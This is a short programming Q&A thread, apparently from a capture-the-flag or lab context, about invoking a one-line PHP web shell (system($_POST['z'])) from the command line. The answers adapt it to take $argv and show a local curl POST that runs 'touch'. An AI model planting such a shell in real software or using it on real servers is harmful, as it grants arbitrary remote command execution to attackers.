# Parse POST parameter to PHP file using CLI

Tags: php, php5

The content of my file:

```
$ cat z-cmd.php 
<?php system($_POST['z']); ?>
```

What I tried:

```
$ QUERY_STRING='z=touch plm' php-cgi z-cmd.php 
X-Powered-By: PHP/5.6.36
Content-type: text/html; charset=UTF-8

<br />
<b>Warning</b>:  system(): Cannot execute a blank command in <b>/home/jeremy/z-cmd.php</b> on line <b>3</b><br />
```

How can I run commands using the z POST parametter?

Answer (score 0, accepted):

Use `$argv` array, its defined by default. `$_POST` can't be used in cli php application.

For the `z-cmd.php` should be like (Note that `$argv[0]` contain the file name itself 'z-cmd.php'):

```
<?php system($argv[1]); ?>
```

and for the command you could use one of the below

```
$ php-cgi z-cmd.php 'touch plm'
$ QUERY_STRING='touch plm' | php-cgi z-cmd.php $QUERY_STRING
```

Answer (score 1):

I know exactly where this is from. :)

Here is an example which should help:

```
curl --data z='touch test' 127.0.0.1/z-cmd.php
```

Comment: Stumbled across this today in the same place you know it to be from. This should be the correct answer, and when running a `ps aux`, you see root running this exact same thing. Of course, chronologically, you probably see it in Notepad before you can ps in the shell though :)